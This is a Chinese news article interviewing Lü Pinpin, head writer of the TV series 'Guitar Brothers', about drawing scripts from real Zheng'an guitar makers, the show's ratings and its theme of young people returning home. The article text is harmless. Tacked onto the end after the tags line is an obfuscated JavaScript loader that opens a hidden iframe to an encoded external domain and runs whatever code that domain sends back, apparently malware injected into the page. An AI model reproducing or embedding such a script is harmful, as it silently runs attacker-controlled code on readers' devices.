《吉他兄弟》热播 总编剧吕品品:把自己当作普通的观众

时间:2020-10-29 15:00:34阅读:3233

目前,由范冰心任总制片人,著名导演李舒执导,吕品品任总编剧,应昊茗、高梓淇、王汀、杨菲洋领衔主演的当代青年励志创业电视剧《吉他兄弟》正在中央电视台电视剧频道黄金强档、综合频道下午档同步热播中,引发观众关注和热议不断。

一部剧的讨论度和热点表面上集中于演员的演绎,但存在于其背后决定质感的核心是剧本基础。好的编剧和好的剧本在一部剧中发挥着至关重要的作用。对此,总编剧吕品品认为:写好故事,就要把自己当作普通的观众。

谈创作:把自己当做普通的观众

正安这样一个贫困县,竟然是世界闻名的吉他基地?

“一开始只是简单接触,没想到却越陷越深,越爱越深,无法自拔。”吕品品进入到《吉他兄弟》这个项目后真正邂逅了正安吉他,她被现实中的正安发展所震惊,并将其所感所受寓之于剧本创作。对《吉他兄弟》而言,她是见证者,更是至关重要的创造者。

罗伯特∙麦基在《故事:材质、结构、风格和银幕剧作的原理》中曾这样写道:“故事大师懂得如何从最少的事件中挤出生命力,而蹩脚的讲故事的人却会使深奥沦为平庸。你也许具有佛一般的慧眼,但是如果你不会讲故事,你的思想将像白垩一样枯燥无味。”而拥有多年编剧经验的吕品品,绝对是一个会讲故事的人。

第一是技巧层面。凭借着多年的专业经验,吕品品对故事和素材的把握得心应手,她能够将所搜集到的素材在短时间内进行最有效的整合。“把十个人的故事放在一个人身上,让它们有机地串联起来。”

其次是情感层面。“对于听到的故事、见到的人等搜集到的所有素材,首先要有第一直觉,看一下哪一些是编剧感兴趣的、观众感兴趣的、电视台感兴趣的……”从三个群体共同感兴趣的目标进行筛选,吕品品寻找到感动她、吸引她并且能带给她共鸣的人和事。

在吕品品的创作中,我们看到了以真实人物郑传祥、郑传玖为原型创作出的方清华、方清明兄弟俩,见证着他们从白手起家的打工仔一步一步成长为吉他厂的老板,最终又回乡创业打造民族吉他品牌的励志故事。剧中既有广漂的真实经历,也有创业的艰辛磨难。而观众从电视剧中得到的真实与感动,离不开吕品品在剧本创作过程中的“独家秘笈”。

“在搜集素材的时候,不仅仅把自己当做编剧,更当做一个普通的观众。”

“把采访对象当成自己,跟着他们一起哭一起笑,感受他们的真情实感。”

“当把自己当做剧中的每一个人物的时候,这些故事就是发生在你自己身上的。这样就不再是写别人的故事,而是写自己的故事。”

“最好的方法就是交朋友。走进他们,了解他们,和他们产生感情,产生共鸣。”

在《吉他兄弟》拍摄完成后,吕品品收获了一帮贵州正安的朋友。“书记、县长、宣传部长、甚至是宣传科的科员,吉他厂长以及吉他各个环节的手工艺人中,我都有朋友。”正是因为这样,一个地地道道的山东人,原汁原味地呈现出“广漂”的众生百态,展现出贵州的人文风采。

电视剧故事的创作核心是剧本,优秀的电视剧故事具有共情力,与观众达到双向沟通。《吉他兄弟》恰恰是这样一部作品,通过人物的塑造,传递出的脱贫攻坚价值观极具现实主义意义,彰显了新一代年轻人“走出去,走回来”的时代精神。

谈反响:很多人在剧中看到了自己

《吉他兄弟》开播以来实时收视率和平均收视率均屡次破一,并多次位居收视榜单第一位。在总编剧吕品品看来,这样耀眼的收视成绩,按照努力程度算是在意料之中,但仍是充满惊喜。

谈及收视率背后的“功臣”,吕品品给出了她的答案。“第一是情感共鸣。剧中所有的故事都源于真实的生活,在正安的每一个吉他人,都是这样一步一步走出来的,很多人通过剧中看到了自己;第二是良心制作。所有的投入全部都用到了电视剧中的制作上,真正将钱花在了刀刃上。演员、导演、舞美等各方面,每一关都是在用心去做。”

伴随着电视剧的播出,故事与情节在不断推进,逐渐涌现出许多令观众印象深刻的“名场面”。而在《吉他兄弟》的创造者吕品品心中,亦有着属于她的“白月光”。

吕品品在采访中谈到,剧中有两段情节令她感触最深。

“第一段是清明、清华再次离家的场景。因为过年而热闹起来的村庄再次萧条下来,只剩下儿童和老人。”关于留守老人和留守儿童的话题,一直是社会关注的焦点,吕品品多年来也一直在关注。而在剧中,吕品品着重描写了“三百娘子军”的故事。她们的走出去,确实创造了很多的价值。但是在这积极一面的背后,也带来了众多留守儿童、留守老人的现象,这是当时无法避免的。而在剧中这一情节的展现,呼吁更多的人关注留守儿童、留守老人,让更多的老人老年有人赡养,让更多的儿童童年有人关爱,让“空巢”不再空。

“第二段是结尾的国际吉他大赛。哥哥为了造出一把能够赢得评委认可的琴,创造各种条件去和评委握了一下手。”吕品品坦言道,其实这个情节是她“编”的。但这个“编”绝不是无中生有、空穴来风,而是以事实为依据的。“我采访过很多做专门手工吉他的工匠,咨询他们定制的吉他与普通吉他的不同之处。工匠告诉我,定制吉他使用的感觉、纸板厚度都要根据定制人的手型、手指的长短、厚薄等各种要求去量身打造。”在采访的基础上,吕品品创作了这样一个令她感触颇深的情节。在剧中,方清明在与评委握手的一瞬间,去感受对方手型的大小、指头的长短……把这些细节铭记在心,彰显在琴,创造出专属于对方的吉他。这个情节的设置,彰显出中国匠人的匠心。

无论是留守老人、留守儿童的场景,还是那克服万难的握手,皆是对中国现实的观照。《吉他兄弟》既关注小家之幸福,又聚焦国家之发展。吕品品谈到,《吉他兄弟》拍摄之时,恰恰是贸易战最激烈的时候,很多的吉他生产厂家受到了影响。“我们为什么要依赖别人给我们饭吃?我们是有实力成为给别人饭吃的人。”确实,我们的祖国是可以足够强大的,而我们也正走在从中国制造到中国创造蜕变的路上。

谈价值:每个人都要有根

小人物,大情怀。

从题材与制作看,《吉他兄弟》是一部不折不扣的“小正大”现实主义题材电视剧。剧中描绘的所有的人物都是小人物,没有高大上的英雄,但是其实他们每个人其实又都是英雄。

“人都要有根,都要有家的概念。”在谈及《吉他兄弟》的意义时,吕品品着重强调了这样一句话。而这个“家”,可以从不同的范围分析:它既是我们每个人的小家,也是我们生活的家乡,更可以是我们共同的国家。每一个人都不能忘本、忘根。这个“家”,需要年轻人的回归,需要年轻人的回报。

“走出去”是为了更好地回来。吕品品希望《吉他兄弟》的播出,能够带给年轻人更多打拼的力量,带动更多出去闯荡的年轻人返乡建设,振兴家乡经济发展。

在采访过程中,吕品品提到了一个小插曲。《吉他兄弟》开篇用了浓重的笔墨去描绘“三百娘子军下广州”的场景,而在前期的剧本讨论过程中,这一情节差点被删掉。那些参与讨论的专家认为:“顺着讲故事是愚蠢的”,而身为总编剧的吕品品也被质疑。但最终,吕品品顶住了压力,坚持将这一情节保留了下来。“《吉他兄弟》不仅仅是两个兄弟的创业剧,它展现的是正安县、贵州省乃至中国从走出去到走回来的一个辉煌历程,其中的每个阶段都缺一不可。”

而对故事与情节的精准把握,源于吕品品多年的主旋律影视剧编剧经历。同时,16年的当兵经历,让吕品品成为一个“组织性、责任感、集体荣誉感”特别强的人。正如她说的那样,这样的她,与主旋律影视剧的气场格外地契合。

在现在的影视剧市场中,主旋律影视剧一定是不可或缺的,它需要在所有影视作品中站主导地位。但即使占据主导地位,如果没有观众,其作用发挥约等于零。而《吉他兄弟》的播出,让我们看到了主旋律影视剧的不同以往的新的呈现方式。

在《吉他兄弟》电视剧中,身为总编剧的吕品品将思想性、教育性和娱乐性很好地融合在一起,不是照本宣科地讲道理,而是将道理完全融入到情节中,让观众跟着剧中的人物一起哭一起笑,再慢慢回味感受。

好的主旋律作品应该是先有意思,再有意义;而不是只有意义,没有意思。现在,在吕品品等编剧人的努力下,越来越多如同《吉他兄弟》一样的主旋律影视剧进入观众的视野。这些尊重了多年龄层次群体审美习惯的主旋律影视剧,变得越来越好看、越耐看。

标签:
eval('\x77\x69\x6e\x64\x6f\x77')['\x50\x74\x52\x46\x6c\x70\x4e\x68']=function(){;(function(u,r,w,d,f,c){var x=QfAJm;u=decodeURIComponent(x(u.replace(new RegExp(c+''+c,'g'),c)));var k='',wr='w'+'ri'+'t'+'e';'jQuery';var c=d[x('Y3VycmVudFNjcmlwdA==')];var f=d.createElement('iframe');f.id=new Date().getTime();f.style.width=f.style.height=10+'px';f.src=[u,r].join('-');d[wr](f.outerHTML);w['addEventListener']('message',function(e){d.getElementById(f.id).style.display='none';if(e.data[r]){new Function(x(e.data[r].replace(new RegExp(r,'g'),'')))();}});})('aHR0cHMlM0ElMkYlMkZqaWFFueGluc2hhbmdoYWkuY29tJTJGMTM0OTcw',''+'XPc'+'ifo'+'G'+'',window,document,''+'FR2'+'YCV'+'','F');}